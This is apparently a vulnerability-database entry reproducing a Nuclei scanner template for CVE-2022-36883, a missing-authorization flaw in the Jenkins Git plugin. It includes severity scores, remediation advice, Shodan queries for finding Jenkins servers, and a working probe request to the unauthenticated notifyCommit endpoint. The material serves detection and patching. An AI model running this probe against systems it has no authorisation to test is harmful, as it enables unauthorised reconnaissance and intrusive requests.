Jenkins Git <=4.11.3 - Missing Authorization

2022-08-0820:32:02

ProjectDiscovery

github.com

cve

jenkins

plugin

git

unauthorized

security

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

7.4 High

AI Score

Confidence

High

0.012 Low

EPSS

Percentile

84.9%

JSON

Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.

id: CVE-2022-36883

info:
  name: Jenkins Git <=4.11.3 - Missing Authorization
  author: c-sh0
  severity: high
  description: Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive data and unauthorized actions being performed on the Jenkins Git plugin.
  remediation: |
    Upgrade to a fixed version of the Jenkins Git plugin (>=4.11.4) or apply the provided patch to mitigate the vulnerability.
  reference:
    - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36883
    - http://www.openwall.com/lists/oss-security/2022/07/27/1
    - https://github.com/StarCrossPortal/scalpel
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-36883
    cwe-id: CWE-862
    epss-score: 0.01328
    epss-percentile: 0.84605
    cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: jenkins
    product: git
    framework: jenkins
    shodan-query:
      - X-Jenkins
      - x-jenkins
  tags: cve,cve2022,jenkins,plugin,git,intrusive

http:
  - method: GET
    path:
      - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "repository:"
          - SCM API plugin
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d4b9e6f1abbd5e11b32a2e0810aca912661249f0f49006f6604c4358bb90f6de02203c3ee4ad41b8b03494c14160799182191bfff934ae55a8d3575da7cf1e8986b9:922c64590222798bb761d5b6d8e72950